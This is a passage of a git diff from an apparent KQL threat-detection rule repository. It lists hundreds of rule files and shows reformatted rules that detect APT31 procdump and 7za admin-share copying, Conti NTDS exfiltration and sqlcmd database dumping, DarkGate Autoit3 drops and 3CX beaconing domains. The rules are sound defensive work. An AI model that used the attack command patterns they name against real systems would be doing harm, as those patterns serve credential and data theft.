.../Persistence/ie_change_domain_zone.kql | 22 +++++----- ..._code_module_command_line_installation.kql | 22 +++++----- .../imports_registry_key_from_a_file.kql | 24 +++++----- .../imports_registry_key_from_an_ads.kql | 18 ++++---- KQL/rules/Persistence/interactive_at_job.kql | 22 +++++----- .../Persistence/linux_webshell_indicators.kql | 22 +++++----- .../Persistence/macos_emond_launch_daemon.kql | 22 +++++----- ...d_in_a_potentially_suspicious_document.kql | 22 +++++----- ...ropped_in_the_teams_or_onedrive_folder.kql | 20 ++++----- ...sk_system_power_settings_via_systemctl.kql | 26 +++++------ .../modification_of_ie_registry_settings.kql | 18 ++++---- ...odify_user_shell_folders_startup_value.kql | 18 ++++---- .../monitoring_for_persistence_via_bits.kql | 24 +++++----- ...sexchange_transport_agent_installation.kql | 22 +++++----- ...enassemblyusagelog_registry_key_tamper.kql | 22 +++++----- .../netntlm_downgrade_attack_registry.kql | 22 +++++----- ..._custom_db_path_registry_configuration.kql | 22 +++++----- ...custom_vbscript_registry_configuration.kql | 22 +++++----- ...ustom_wmi_query_registry_configuration.kql | 22 +++++----- .../new_kernel_driver_via_sc_exe.kql | 22 +++++----- .../new_odbc_driver_registered.kql | 22 +++++----- .../new_service_creation_using_powershell.kql | 24 +++++----- .../new_service_creation_using_sc_exe.kql | 24 +++++----- ...ders_registered_with_uncommon_dll_name.kql | 22 +++++----- .../new_user_created_via_net_exe.kql | 24 +++++----- ...d_via_net_exe_with_never_expire_option.kql | 22 +++++----- ..._privileged_usage_of_reg_or_powershell.kql | 18 ++++---- ...office_application_startup_office_test.kql | 22 +++++----- .../office_macros_warning_disabled.kql | 22 +++++----- ...ientmailrules_setting_enabled_registry.kql | 18 ++++---- ...ook_security_settings_updated_registry.kql | 22 +++++----- .../path_to_screensaver_binary_modified.kql | 22 +++++----- ...tence_via_disk_cleanup_handler_autorun.kql | 28 ++++++------ .../persistence_via_hhctrl_ocx.kql | 22 +++++----- .../persistence_via_new_sip_provider.kql | 22 +++++----- .../persistence_via_sticky_key_backdoor.kql | 24 +++++----- ...persistence_via_typedpaths_commandline.kql | 18 ++++---- ...scalation_via_weak_service_permissions.kql | 18 ++++---- .../potential_appverifui_dll_sideloading.kql | 22 +++++----- .../potential_avkkid_dll_sideloading.kql | 18 ++++---- .../potential_azure_browser_sso_abuse.kql | 24 +++++----- ...inary_or_script_dropper_via_powershell.kql | 22 +++++----- ...tstrike_service_installations_registry.kql | 22 +++++----- .../potential_eacore_dll_sideloading.kql | 22 +++++----- .../potential_edputil_dll_sideloading.kql | 22 +++++----- .../potential_goopdate_dll_sideloading.kql | 24 +++++----- .../potential_iviewers_dll_sideloading.kql | 18 ++++---- .../potential_mfdetours_dll_sideloading.kql | 22 +++++----- ...rsistence_attempt_via_errorhandler_cmd.kql | 20 ++++----- .../potential_persistence_via_autodialdll.kql | 22 +++++----- ...tential_persistence_via_chm_helper_dll.kql | 18 ++++---- ...ersistence_via_custom_protocol_handler.kql | 22 +++++----- ...ence_via_disk_cleanup_handler_registry.kql | 32 +++++++------- ...ential_persistence_via_dllpathoverride.kql | 18 ++++---- ...ersistence_via_event_viewer_events_asp.kql | 18 ++++---- ..._persistence_via_excel_add_in_registry.kql | 18 ++++---- ...tential_persistence_via_lsa_extensions.kql | 24 +++++----- ...ersistence_via_microsoft_office_add_in.kql | 22 +++++----- ...ce_via_microsoft_office_startup_folder.kql | 24 +++++----- .../potential_persistence_via_mpnotify.kql | 22 +++++----- ...rsistence_via_mycomputer_registry_keys.kql | 22 +++++----- ...stence_via_new_amsi_providers_registry.kql | 22 +++++----- ...ential_persistence_via_notepad_plugins.kql | 24 +++++----- ...potential_persistence_via_outlook_form.kql | 22 +++++----- .../potential_persistence_via_typedpaths.kql | 22 +++++----- ...nce_via_visual_studio_tools_for_office.kql | 22 +++++----- ...ation_via_service_permissions_weakness.kql | 18 ++++---- .../potential_qakbot_registry_activity.kql | 18 ++++---- .../potential_rcdll_dll_sideloading.kql | 18 ++++---- ..._dll_sideloading_from_default_location.kql | 18 ++++---- ..._sideloading_from_non_default_location.kql | 22 +++++----- .../potential_roboform_dll_sideloading.kql | 22 +++++----- ...ll_context_menu_scan_command_tampering.kql | 18 ++++---- ...otential_shelldispatch_dll_sideloading.kql | 22 +++++----- ...m_database_persistence_via_sdbinst_exe.kql | 20 ++++----- .../potential_smadhook_dll_sideloading.kql | 22 +++++----- ...ential_solidpdfcreator_dll_sideloading.kql | 18 ++++---- ...picious_powershell_module_file_created.kql | 22 +++++----- ...ous_registry_file_imported_via_reg_exe.kql | 22 +++++----- ..._rdp_related_registry_keys_via_reg_exe.kql | 18 ++++---- .../potential_vivaldi_elf_dll_sideloading.kql | 18 ++++---- .../potential_waveedit_dll_sideloading.kql | 22 +++++----- ...al_webshell_creation_on_static_website.kql | 22 +++++----- .../potential_wwlib_dll_sideloading.kql | 18 ++++---- ...ious_child_process_of_keyscrambler_exe.kql | 18 ++++---- ...esktop_background_change_using_reg_exe.kql | 24 +++++----- ...desktop_background_change_via_registry.kql | 24 +++++----- ...picious_malware_callback_communication.kql | 18 ++++---- ...s_malware_callback_communication_linux.kql | 18 ++++---- ...hell_script_creation_in_profile_folder.kql | 24 +++++----- .../powershell_module_file_created.kql | 22 +++++----- ...file_created_by_non_powershell_process.kql | 18 ++++---- .../powershell_profile_modification.kql | 22 +++++----- ...hell_script_dropped_via_powershell_exe.kql | 22 +++++----- ...er_creation_by_non_sysinternals_binary.kql | 24 +++++----- ...er_creation_by_non_sysinternals_binary.kql | 22 +++++----- .../pua_system_informer_execution.kql | 22 +++++----- ..._winnti_playbook_registry_manipulation.kql | 18 ++++---- .../Persistence/reg_add_suspicious_paths.kql | 22 +++++----- .../register_new_ifiltre_for_persistence.kql | 24 +++++----- .../registry_explorer_policy_modification.kql | 22 +++++----- .../registry_hide_function_from_user.kql | 22 +++++----- ...gistry_manipulation_via_wmi_stdregprov.kql | 26 +++++------ ..._modification_to_hidden_file_extension.kql | 22 +++++----- .../registry_modification_via_regini_exe.kql | 22 +++++----- ...ccess_tool_anydesk_incoming_connection.kql | 22 +++++----- ...l_screenconnect_installation_execution.kql | 22 +++++----- ...m_viewer_session_started_on_linux_host.kql | 24 +++++----- ...m_viewer_session_started_on_macos_host.kql | 24 +++++----- ...viewer_session_started_on_windows_host.kql | 24 +++++----- ..._potential_com_hijacking_registry_keys.kql | 24 +++++----- ...ctedadminmode_registry_value_tampering.kql | 22 +++++----- ..._registry_value_tampering_proccreation.kql | 22 +++++----- ...un_once_task_configuration_in_registry.kql | 22 +++++----- ...sk_execution_as_configured_in_registry.kql | 18 ++++---- ...sabled_via_minint_registry_key_process.kql | 26 +++++------ ...d_via_minint_registry_key_registry_set.kql | 26 +++++------ .../service_binary_in_suspicious_folder.kql | 18 ++++---- ...dacl_abuse_to_hide_services_via_sc_exe.kql | 18 ++++---- ...curity_descriptor_tampering_via_sc_exe.kql | 18 ++++---- KQL/rules/Persistence/servicedll_hijack.kql | 26 +++++------ .../shell_open_registry_keys_manipulation.kql | 18 ++++---- KQL/rules/Persistence/shimcache_flush.kql | 18 ++++---- .../startup_item_file_created_macos.kql | 26 +++++------ .../suspicious_aspx_file_drop_by_exchange.kql | 18 ++++---- ...nstance_executed_with_custom_extension.kql | 18 ++++---- ...spicious_debugger_registration_cmdline.kql | 18 ++++---- ..._activity_from_fake_recycle_bin_folder.kql | 18 ++++---- .../suspicious_file_drop_by_exchange.kql | 18 ++++---- ...s_file_write_to_webapps_root_directory.kql | 20 ++++----- .../suspicious_iis_module_registration.kql | 22 +++++----- .../suspicious_new_service_creation.kql | 22 +++++----- ...ious_printer_driver_empty_manufacturer.kql | 22 +++++----- ...spicious_process_by_web_server_process.kql | 22 +++++----- ...execution_from_fake_recycle_bin_folder.kql | 22 +++++----- ...y_modification_from_ads_via_regini_exe.kql | 18 ++++---- ...uspicious_screensave_change_by_reg_exe.kql | 24 +++++----- .../suspicious_service_path_modification.kql | 22 +++++----- .../suspicious_vboxdrvinst_exe_parameters.kql | 26 +++++------ ...nt_connection_history_cleared_registry.kql | 18 ++++---- ...rust_access_disable_for_vbapplications.kql | 22 +++++----- ..._bypass_via_windows_directory_spoofing.kql | 24 +++++----- .../Persistence/uac_bypass_with_fake_dll.kql | 22 +++++----- ...fi_persistence_via_wpbbin_filecreation.kql | 22 +++++----- ...persistence_via_wpbbin_processcreation.kql | 22 +++++----- ..._database_installation_via_sdbinst_exe.kql | 20 ++++----- ...icrosoft_office_trusted_location_added.kql | 22 +++++----- ...allation_attempt_using_add_appxpackage.kql | 22 +++++----- .../unusual_child_process_of_dns_exe.kql | 18 ++++---- .../unusual_file_deletion_by_dns_exe.kql | 18 ++++---- .../unusual_file_modification_by_dns_exe.kql | 18 ++++---- .../user_added_to_admin_group_via_dscl.kql | 22 +++++----- ...r_added_to_admin_group_via_dseditgroup.kql | 22 +++++----- ...r_added_to_admin_group_via_sysadminctl.kql | 22 +++++----- ...vscode_powershell_profile_modification.kql | 22 +++++----- ...digest_credguard_registry_modification.kql | 22 +++++----- .../wdigest_enable_uselogoncredential.kql | 18 ++++---- ...l_detection_with_command_line_keywords.kql | 18 ++++---- .../webshell_hacking_activity_patterns.kql | 22 +++++----- .../webshell_tool_reconnaissance_activity.kql | 18 ++++---- ...inlogon_allowmultipletssessions_enable.kql | 26 +++++------ .../wmi_persistence_script_event_consumer.kql | 24 +++++----- .../Persistence/wmi_persistence_security.kql | 22 +++++----- ...d_port_monitor_persistence_in_registry.kql | 20 ++++----- ...curity_descriptor_tampering_via_sc_exe.kql | 18 ++++---- .../atbroker_registry_change.kql | 22 +++++----- .../bypass_uac_using_delegateexecute.kql | 18 ++++---- .../bypass_uac_using_event_viewer.kql | 18 ++++---- .../bypass_uac_using_silentcleanup_task.kql | 22 +++++----- .../bypass_uac_via_cmstp.kql | 22 +++++----- .../bypass_uac_via_wsreset_exe.kql | 22 +++++----- ...le_association_to_executable_via_assoc.kql | 20 ++++----- ...nge_default_file_association_via_assoc.kql | 24 +++++----- ...ng_service_imagepath_value_via_reg_exe.kql | 22 +++++----- .../classes_autorun_keys_modification.kql | 24 +++++----- .../com_hijacking_via_treatas.kql | 22 +++++----- ..._of_default_system_clsid_default_value.kql | 22 +++++----- .../common_autorun_keys_modification.kql | 24 +++++----- .../control_panel_items.kql | 18 ++++---- ...created_files_by_microsoft_sync_center.kql | 18 ++++---- ...ion_exe_for_service_with_unquoted_path.kql | 20 ++++----- ...werfault_exe_wer_dll_in_unusual_folder.kql | 18 ++++---- ...ntcontrolset_autorun_keys_modification.kql | 24 +++++----- ...rrentversion_autorun_keys_modification.kql | 24 +++++----- ...ntversion_nt_autorun_keys_modification.kql | 24 +++++----- ..._rdp_port_changed_to_non_standard_port.kql | 22 +++++----- ...curity_descriptor_tampering_via_sc_exe.kql | 18 ++++---- .../dhcp_callout_dll_installation.kql | 18 ++++---- .../direct_autorun_keys_modification.kql | 26 +++++------ ...execution_via_register_cimprovider_exe.kql | 18 ++++---- .../dll_load_via_lsass.kql | 18 ++++---- ...dll_sideloading_by_vmware_xfer_utility.kql | 22 +++++----- .../dllhost_exe_execution_anomaly.kql | 22 +++++----- .../explorer_nouaccheck_flag.kql | 24 +++++----- .../fax_service_dll_search_order_hijack.kql | 22 +++++----- ...on_in_suspicious_directory_by_msdt_exe.kql | 18 ++++---- .../guest_account_enabled_via_sysadminctl.kql | 18 ++++---- ...cktool_crackmapexec_execution_patterns.kql | 18 ++++---- ..._dinjector_powershell_cradle_execution.kql | 22 +++++----- .../hacktool_hollowreaper_execution.kql | 20 ++++----- .../hacktool_impersonate_execution.kql | 18 ++++---- .../hacktool_sharpdpapi_execution.kql | 20 ++++----- .../hacktool_sharpersist_execution.kql | 18 ++++---- .../hacktool_sharpimpersonation_execution.kql | 18 ++++---- .../hacktool_winpeas_execution.kql | 22 +++++----- ...or_privilege_escalation_tool_execution.kql | 20 ++++----- ...net_explorer_autorun_keys_modification.kql | 24 +++++----- ...h_agent_daemon_execution_via_launchctl.kql | 22 +++++----- .../linux_sudo_chroot_execution.kql | 28 ++++++------ ..._center_suspicious_network_connections.kql | 18 ++++---- .../narrator_s_feedback_hub_persistence.kql | 18 ++++---- ...k_connection_initiated_via_notepad_exe.kql | 26 +++++------ ...ripteventconsumer_created_via_wmic_exe.kql | 22 +++++----- .../new_custom_shim_database_created.kql | 24 +++++----- ...new_dns_serverlevelplugindll_installed.kql | 18 ++++---- ...evelplugindll_installed_via_dnscmd_exe.kql | 18 ++++---- ..._registered_from_a_suspicious_location.kql | 18 ++++---- .../new_outlook_macro_created.kql | 22 +++++----- ..._run_key_pointing_to_suspicious_folder.kql | 22 +++++----- .../office_autorun_keys_modification.kql | 24 +++++----- ...cution_without_warning_setting_enabled.kql | 22 +++++----- .../password_set_to_never_expire_via_wmi.kql | 22 +++++----- .../persistence_via_cron_files.kql | 22 +++++----- .../persistence_via_sudoers_files.kql | 22 +++++----- ..._hijacking_via_treatas_subkey_registry.kql | 22 +++++----- ...jection_or_execution_using_tracker_exe.kql | 18 ++++---- ...ential_dll_sideloading_of_dbgmodel_dll.kql | 22 +++++----- ...potential_dll_sideloading_of_mpsvc_dll.kql | 22 +++++----- ...ential_dll_sideloading_of_mscorsvc_dll.kql | 22 +++++----- ...tial_dll_sideloading_using_coregen_exe.kql | 18 ++++---- ...dll_sideloading_via_deviceenroller_exe.kql | 20 ++++----- ...ential_dll_sideloading_via_vmware_xfer.kql | 22 +++++----- ..._access_via_dll_search_order_hijacking.kql | 18 ++++---- ..._process_code_injection_via_dd_utility.kql | 18 ++++---- .../potential_mpclient_dll_sideloading.kql | 22 +++++----- ..._dll_sideloading_via_defender_binaries.kql | 22 +++++----- ...attempt_via_existing_service_tampering.kql | 18 ++++---- ...nce_attempt_via_run_keys_using_reg_exe.kql | 26 +++++------ .../potential_persistence_using_debugpath.kql | 18 ++++---- ...istence_via_app_paths_default_property.kql | 28 ++++++------ ...via_appcompat_registerapprestart_layer.kql | 26 +++++------ .../potential_persistence_via_globalflags.kql | 18 ++++---- ...sistence_via_logon_scripts_commandline.kql | 22 +++++----- ...persistence_via_logon_scripts_registry.kql | 22 +++++----- ..._via_microsoft_compatibility_appraiser.kql | 20 ++++----- ...ntial_persistence_via_netsh_helper_dll.kql | 18 ++++---- ...sistence_via_netsh_helper_dll_registry.kql | 22 +++++----- ...utlook_loadmacroprovideronboot_setting.kql | 18 ++++---- .../potential_persistence_via_plistbuddy.kql | 18 ++++---- ...powershell_search_order_hijacking_task.kql | 18 ++++---- ...rsistence_via_scrobj_dll_com_hijacking.kql | 22 +++++----- ...via_shim_database_in_uncommon_location.kql | 18 ++++---- ...istence_via_shim_database_modification.kql | 24 +++++----- ...tion_using_symlink_between_osk_and_cmd.kql | 18 ++++---- ...tential_process_injection_via_msra_exe.kql | 22 +++++----- ...otential_psfactorybuffer_com_hijacking.kql | 18 ++++---- ...istence_attempt_via_dbgmanageddebugger.kql | 22 +++++----- ...sistence_attempt_via_windows_telemetry.kql | 24 +++++----- ...ential_ripzip_attack_on_startup_folder.kql | 22 +++++----- ...istence_install_using_a_scheduled_task.kql | 18 ++++---- ...hortcut_persistence_via_powershell_exe.kql | 28 ++++++------ .../potential_uac_bypass_via_sdclt_exe.kql | 18 ++++---- ...ll_web_access_feature_enabled_via_dism.kql | 22 +++++----- ...istry_persistence_via_explorer_run_key.kql | 18 ++++---- ..._dll_execution_with_uncommon_extension.kql | 22 +++++----- .../renamed_vmnat_exe_execution.kql | 18 ++++---- .../root_account_enable_via_dsenableroot.kql | 18 ++++---- .../rundll32_registered_com_objects.kql | 22 +++++----- ...ially_suspicious_path_via_schtasks_exe.kql | 24 +++++----- ...ation_masquerading_as_system_processes.kql | 22 +++++----- ...th_curl_and_powershell_execution_combo.kql | 26 +++++------ ...xecuting_encoded_payload_from_registry.kql | 22 +++++----- ...d_task_executing_payload_from_registry.kql | 18 ++++---- .../scheduled_task_job_at.kql | 24 +++++----- ...d_taskcache_change_by_uncommon_program.kql | 18 ++++---- ...or_modification_with_system_privileges.kql | 18 ++++---- .../schtasks_from_suspicious_folders.kql | 18 ++++---- ..._privileges_enumeration_via_whoami_exe.kql | 18 ++++---- ...rovider_ssp_added_to_lsa_configuration.kql | 18 ++++---- ...sion_manager_autorun_keys_modification.kql | 24 +++++----- ...p16_exe_execution_with_custom_lst_file.kql | 26 +++++------ .../startup_folder_file_write.kql | 22 +++++----- .../sticky_key_like_backdoor_execution.kql | 22 +++++----- ...ticky_key_like_backdoor_usage_registry.kql | 22 +++++----- ...ious_autorun_registry_modified_via_wmi.kql | 22 +++++----- ...nd_patterns_in_scheduled_task_creation.kql | 22 +++++----- .../suspicious_desktop_ini_action.kql | 24 +++++----- ...spicious_driver_install_by_pnputil_exe.kql | 26 +++++------ .../suspicious_get_variable_exe_creation.kql | 22 +++++----- .../suspicious_grpconv_execution.kql | 18 ++++---- .../suspicious_gup_usage.kql | 22 +++++----- ...icious_modification_of_scheduled_tasks.kql | 22 +++++----- ...ication_on_the_printer_spooler_service.kql | 18 ++++---- .../suspicious_outlook_macro_created.kql | 22 +++++----- ...icious_powershell_in_registry_run_keys.kql | 22 +++++----- .../suspicious_run_key_from_download.kql | 22 +++++----- ...suspicious_runas_like_flag_combination.kql | 18 ++++---- ...ious_rundll32_invoking_inline_vbscript.kql | 18 ++++---- ...ed_task_creation_involving_temp_folder.kql | 24 +++++----- ...task_creation_via_masqueraded_xml_file.kql | 18 ++++---- ...suspicious_scheduled_task_name_as_guid.kql | 22 +++++----- ...scheduled_task_write_to_system32_tasks.kql | 18 ++++---- ...ious_schtasks_execution_appdata_folder.kql | 18 ++++---- ...sks_schedule_type_with_high_privileges.kql | 22 +++++----- .../suspicious_schtasks_schedule_types.kql | 22 +++++----- ...cious_screensaver_binary_file_creation.kql | 20 ++++----- ...cl_modification_via_set_service_cmdlet.kql | 18 ++++---- ...icious_shim_database_patching_activity.kql | 18 ++++---- .../suspicious_startup_folder_persistence.kql | 26 +++++------ .../suspicious_userinit_child_process.kql | 22 +++++----- .../sysinternals_psservice_execution.kql | 22 +++++----- .../sysinternals_pssuspend_execution.kql | 18 ++++---- ...stem_scripts_autorun_keys_modification.kql | 24 +++++----- .../tasks_folder_evasion.kql | 22 +++++----- ...cross_ebpf_rootkit_default_persistence.kql | 22 +++++----- .../trustedpath_uac_bypass_pattern.kql | 18 ++++---- .../Privilege Escalation/uac_disabled.kql | 18 ++++---- .../uac_notification_disabled.kql | 22 +++++----- .../uac_secure_desktop_prompt_disabled.kql | 22 +++++----- .../uncommon_userinit_child_process.kql | 22 +++++----- .../user_added_to_highly_privileged_group.kql | 22 +++++----- ...er_added_to_local_administrators_group.kql | 22 +++++----- ...ed_to_root_sudoers_group_using_usermod.kql | 22 +++++----- .../using_settingsynchost_exe_as_lolbin.kql | 18 ++++---- .../vbscript_payload_stored_in_registry.kql | 18 ++++---- ..._exe_execution_from_privileged_process.kql | 18 ++++---- ...vent_log_access_tampering_via_registry.kql | 22 +++++----- ...tings_modification_by_uncommon_process.kql | 22 +++++----- .../winekey_registry_modification.kql | 18 ++++---- .../winlogon_notify_key_logon_persistence.kql | 20 ++++----- ...ar_creating_files_in_startup_locations.kql | 20 ++++----- .../winsock2_autorun_keys_modification.kql | 24 +++++----- .../wmi_backdoor_exchange_transport_agent.kql | 18 ++++---- ...ersistence_command_line_event_consumer.kql | 22 +++++----- ...tence_script_event_consumer_file_write.kql | 22 +++++----- ...node_classes_autorun_keys_modification.kql | 24 +++++----- ...rrentversion_autorun_keys_modification.kql | 24 +++++----- ...rrentversion_autorun_keys_modification.kql | 24 +++++----- .../writing_local_admin_share.kql | 20 ++++----- ...xe_execution_from_non_default_location.kql | 24 +++++----- .../access_of_sudoers_file_content.kql | 22 +++++----- .../Reconnaissance/linux_recon_indicators.kql | 22 +++++----- ...umeration_using_ad_module_proccreation.kql | 22 +++++----- .../print_history_file_contents.kql | 22 +++++----- .../pua_pingcastle_execution.kql | 18 ++++---- ...ion_from_potentially_suspicious_parent.kql | 18 ++++---- .../Reconnaissance/suspicious_git_clone.kql | 18 ++++---- .../suspicious_git_clone_linux.kql | 18 ++++---- .../creation_of_a_diagcab.kql | 22 +++++----- .../hacktool_purplesharp_execution.kql | 22 +++++----- ...nmanager_service_installation_registry.kql | 18 ++++---- ...ential_execution_of_sysinternals_tools.kql | 24 +++++----- ...l_privilege_escalation_to_local_system.kql | 24 +++++----- .../potential_psexec_remote_execution.kql | 18 ++++---- ...exec_paexec_escalation_to_local_system.kql | 24 +++++----- .../pua_csexec_execution.kql | 18 ++++---- ...ua_sysinternal_tool_execution_registry.kql | 24 +++++----- ..._sysinternals_tools_execution_registry.kql | 22 +++++----- ...named_sysinternals_debugview_execution.kql | 18 ++++---- ...of_renamed_sysinternals_tools_registry.kql | 22 +++++----- .../suspicious_keyboard_layout_load.kql | 22 +++++----- ..._file_created_in_office_startup_folder.kql | 22 +++++----- ...renamed_sysinternals_tools_registryset.kql | 22 +++++----- .../vhd_image_download_via_browser.kql | 24 +++++----- sigma | 1 + 2226 files changed, 23328 insertions(+), 23327 deletions(-) create mode 160000 sigma diff --git a/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql b/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql index a3ff5e5f..58cd05f6 100644 --- a/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql +++ b/KQL/rules-emerging-threats/Collection/apt31_judgement_panda_activity.kql @@ -1,12 +1,12 @@ -// Title: APT31 Judgement Panda Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2019-02-21 -// Level: critical -// Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report -// MITRE Tactic: Collection -// Tags: attack.collection, attack.lateral-movement, attack.credential-access, attack.g0128, attack.t1003.001, attack.t1560.001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: APT31 Judgement Panda Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-21 +// Level: critical +// Description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report +// MITRE Tactic: Collection +// Tags: attack.collection, attack.lateral-movement, attack.credential-access, attack.g0128, attack.t1003.001, attack.t1560.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains "\\aaaa\\procdump64.exe" or ProcessCommandLine contains "\\aaaa\\netsess.exe" or ProcessCommandLine contains "\\aaaa\\7za.exe" or ProcessCommandLine contains "\\c$\\aaaa\\") and (ProcessCommandLine contains "copy \\\\" and ProcessCommandLine contains "c$")) or (ProcessCommandLine contains "ldifde" and ProcessCommandLine contains "-f -n" and ProcessCommandLine contains "eprod.ldf") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql b/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql index 8296109c..aab5306a 100644 --- a/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql +++ b/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql @@ -1,10 +1,10 @@ -// Title: Conti NTDS Exfiltration Command -// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) -// Date: 2021-08-09 -// Level: high -// Description: Detects a command used by conti to exfiltrate NTDS -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1560, detection.emerging-threats - -DeviceProcessEvents +// Title: Conti NTDS Exfiltration Command +// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) +// Date: 2021-08-09 +// Level: high +// Description: Detects a command used by conti to exfiltrate NTDS +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "7za.exe" and ProcessCommandLine contains "\\C$\\temp\\log.zip" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql b/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql index da60e4e6..b2296125 100644 --- a/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql +++ b/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql @@ -1,10 +1,10 @@ -// Title: Potential Conti Ransomware Database Dumping Activity Via SQLCmd -// Author: frack113 -// Date: 2021-08-16 -// Level: high -// Description: Detects a command used by conti to dump database -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1005, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Conti Ransomware Database Dumping Activity Via SQLCmd +// Author: frack113 +// Date: 2021-08-16 +// Level: high +// Description: Detects a command used by conti to dump database +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1005, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "sys.sysprocesses" or ProcessCommandLine contains "master.dbo.sysdatabases" or ProcessCommandLine contains "BACKUP DATABASE") and ProcessCommandLine contains " -S localhost " and (FolderPath endswith "\\sqlcmd.exe" or (ProcessCommandLine contains "sqlcmd " or ProcessCommandLine contains "sqlcmd.exe")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql b/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql index 2aede8b8..b347ed04 100644 --- a/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql +++ b/KQL/rules-emerging-threats/Command and Control/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql @@ -1,13 +1,13 @@ -// Title: DarkGate - Autoit3.EXE File Creation By Uncommon Process -// Author: Micah Babinski -// Date: 2023-10-15 -// Level: medium -// Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. -// This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs -// process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other -// processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.execution, attack.t1105, attack.t1059, detection.emerging-threats - -DeviceFileEvents +// Title: DarkGate - Autoit3.EXE File Creation By Uncommon Process +// Author: Micah Babinski +// Date: 2023-10-15 +// Level: medium +// Description: Detects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. +// This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs +// process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other +// processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.t1105, attack.t1059, detection.emerging-threats + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\Autoit3.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\KeyScramblerLogon.exe" or InitiatingProcessFolderPath endswith "\\wmprph.exe") and FolderPath endswith "\\Autoit3.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql b/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql index e0507dbe..b5aced43 100644 --- a/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql +++ b/KQL/rules-emerging-threats/Command and Control/pandemic_registry_key.kql @@ -1,10 +1,10 @@ -// Title: Pandemic Registry Key -// Author: Florian Roth (Nextron Systems) -// Date: 2017-06-01 -// Level: critical -// Description: Detects Pandemic Windows Implant -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105, detection.emerging-threats - -DeviceRegistryEvents +// Title: Pandemic Registry Key +// Author: Florian Roth (Nextron Systems) +// Date: 2017-06-01 +// Level: critical +// Description: Detects Pandemic Windows Implant +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, detection.emerging-threats + +DeviceRegistryEvents | where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\services\\null\\Instance" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql b/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql index 7a9ee05c..265d4327 100644 --- a/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql +++ b/KQL/rules-emerging-threats/Command and Control/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql @@ -1,12 +1,12 @@ -// Title: Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-03-29 -// Level: high -// Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceNetworkEvents +// Title: Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-29 +// Level: high +// Description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceNetworkEvents | where (RemoteUrl contains "akamaicontainer.com" or RemoteUrl contains "akamaitechcloudservices.com" or RemoteUrl contains "azuredeploystore.com" or RemoteUrl contains "azureonlinecloud.com" or RemoteUrl contains "azureonlinestorage.com" or 